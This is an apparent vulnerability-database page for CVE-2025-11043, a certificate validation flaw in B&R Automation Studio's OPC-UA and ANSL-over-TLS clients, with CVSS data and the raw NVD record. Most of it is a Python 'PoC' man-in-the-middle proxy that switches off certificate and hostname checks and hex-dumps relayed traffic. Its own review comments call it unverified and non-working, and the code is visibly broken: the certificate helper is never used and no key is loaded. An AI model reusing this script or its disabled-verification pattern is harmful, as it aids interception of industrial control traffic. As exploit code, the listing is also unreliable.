Security Vulnerability Report
CVE-2025-11043 CVSS 7.4 HIGH

CVE-2025-11043

Published: 2026-01-19 16:15:53
Last Modified: 2026-04-15 00:35:42

Description

An Improper Certificate Validation vulnerability in the OPC-UA client and ANSL over TLS client used in Automation Studio versions before 6.5 could allow an unauthenticated attacker on the network to position themselves to intercept and interfere with data exchanges.

CVSS Details (v3.1; the raw record below also carries a CVSS v4.0 base score of 9.1 CRITICAL)

CVSS Score
7.4
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N

Configurations (Affected Products)

No configuration data is available in the record; the affected product, per the description, is:

B&R Automation Studio < 6.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-11043 PoC - Certificate Validation Bypass
# Target: B&R Automation Studio OPC-UA/ANSL Client
# Environment: Network accessible to target
#
# Reviewer context:
# - The weakness class recorded for this CVE is CWE-295 (improper certificate
#   validation) in the OPC-UA client and the ANSL-over-TLS client of
#   Automation Studio versions before 6.5. The description states the fix
#   boundary as 6.5; the vendor advisory is linked in the record's references.
# - A client with this weakness accepts a TLS peer whose certificate does not
#   chain to a trusted anchor or does not match the expected identity, so
#   anything placed on the network path can read and alter the session. This
#   matches the C:H / I:H / A:N ratings in the CVSS vector.
# - NOTE(review): this listing is unverified and does not appear to be a
#   working reproduction (see the notes on the individual calls). Do not use
#   it to decide whether an installation is patched; check the installed
#   Automation Studio version against the advisory instead.
import socket
import ssl
import struct  # imported but not used anywhere in this listing
from OpenSSL import crypto


def generate_fake_certificate():
    """Generate a self-signed certificate for MITM attack.

    Builds a fresh 2048-bit RSA key and an X.509 certificate whose subject CN
    is the literal string "Target Server CN", with serial number 1000 and a
    validity window from now to 365 days ahead, then signs the certificate
    with its own key using SHA-256.

    Returns:
        A ``(cert, key)`` tuple of pyOpenSSL ``X509`` and ``PKey`` objects.

    Note:
        This helper is not called anywhere in this listing. A certificate of
        this kind chains to no trusted anchor, so a client that validates the
        chain and the peer identity rejects it during the handshake. That
        rejection is the control the CVE description reports as missing.
    """
    key = crypto.PKey()
    key.generate_key(crypto.TYPE_RSA, 2048)
    cert = crypto.X509()
    cert.get_subject().CN = "Target Server CN"
    cert.set_serial_number(1000)
    # Validity is expressed as offsets in seconds from the current time.
    cert.gmtime_adj_notBefore(0)
    cert.gmtime_adj_notAfter(365*24*60*60)
    cert.set_pubkey(key)
    # Signed with its own private key, so no CA is involved.
    cert.sign(key, 'sha256')
    return cert, key


def create_mitm_proxy(target_host, target_port, listen_port=4840):
    """Create MITM proxy for OPC-UA connection.

    Listens on every local interface at ``listen_port`` (default 4840),
    accepts TCP connections one at a time, opens a TCP connection to
    ``(target_host, target_port)`` for each, and relays data between the two
    while printing every chunk received from the accepted side as hex.

    Args:
        target_host: Address of the upstream server to connect to.
        target_port: TCP port of the upstream server.
        listen_port: Local TCP port to accept connections on.

    Returns:
        Never returns normally; the accept loop runs until the process is
        interrupted.
    """
    # TLS context with all peer checks switched off. These two assignments are
    # the Python form of the CWE-295 pattern and are what to look for when
    # reviewing client code. check_hostname has to be cleared first, because
    # the ssl module refuses CERT_NONE while hostname checking is still on.
    context = ssl.create_default_context()
    context.check_hostname = False  # Bypass hostname verification
    context.verify_mode = ssl.CERT_NONE  # Disable certificate verification
    # Second context left at the library defaults (certificate required,
    # hostname checked).
    server_context = ssl.create_default_context()
    mitm_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    mitm_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    # '0.0.0.0' binds the listener on all IPv4 interfaces of the host.
    mitm_socket.bind(('0.0.0.0', listen_port))
    mitm_socket.listen(5)
    print(f"[*] MITM Proxy listening on port {listen_port}")
    print(f"[*] Redirecting to {target_host}:{target_port}")
    while True:
        client_socket, addr = mitm_socket.accept()
        print(f"[+] Connection from {addr}")
        try:
            # Connect to legitimate server
            server_socket = socket.create_connection((target_host, target_port))
            # Wrap with SSL (vulnerable context)
            # Both wrappers are created in TLS client mode (server_side=False).
            # NOTE(review): the listing never loads a certificate or key into
            # either context.
            secure_client = context.wrap_socket(client_socket, server_side=False)
            secure_server = server_context.wrap_socket(server_socket, server_side=False)
            # Forward traffic (intercept/modify as needed)
            # Strict request/response lockstep: one read from the accepted
            # side, one read from the upstream side, repeated until the
            # accepted side closes.
            while True:
                data = secure_client.recv(4096)
                if not data:
                    break
                # Every relayed payload is printed in full. This illustrates
                # the confidentiality impact when a client accepts an
                # unvalidated peer.
                print(f"[*] Intercepted: {data.hex()}")
                secure_server.sendall(data)
                response = secure_server.recv(4096)
                secure_client.sendall(response)
        except Exception as e:
            # Any failure for this connection is reported and the accept loop
            # continues.
            print(f"[-] Error: {e}")
        finally:
            # Close the raw sockets for this connection.
            client_socket.close()
            server_socket.close()


if __name__ == "__main__":
    # Usage: python cve-2025-11043-poc.py <target_ip> <target_port>
    import sys
    # Both positional arguments are required; the listen port stays at the
    # function default.
    if len(sys.argv) < 3:
        print("Usage: python cve-2025-11043-poc.py <target_ip> <target_port>")
        sys.exit(1)
    target_ip = sys.argv[1]
    target_port = int(sys.argv[2])
    create_mitm_proxy(target_ip, target_port)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-11043", "sourceIdentifier": "[email protected]", "published": "2026-01-19T16:15:52.873", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "An Improper Certificate Validation vulnerability in the OPC-UA client and ANSL over TLS client used in Automation Studio versions before 6.5 could allow an unauthenticated attacker on the network to position themselves to intercept and interfere with data exchanges."}, {"lang": "es", "value": "Una vulnerabilidad de validación de certificado incorrecta en el cliente OPC-UA y el cliente ANSL sobre TLS utilizada en versiones de Automation Studio anteriores a la 6.5 podría permitir a un atacante no autenticado en la red posicionarse para interceptar e interferir con los intercambios de datos."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "PRESENT", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": 
"NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N", "baseScore": 7.4, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.2, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-295"}]}], "references": [{"url": "https://www.br-automation.com/fileadmin/SA25P004-4f45197f.pdf", "source": "[email protected]"}]}}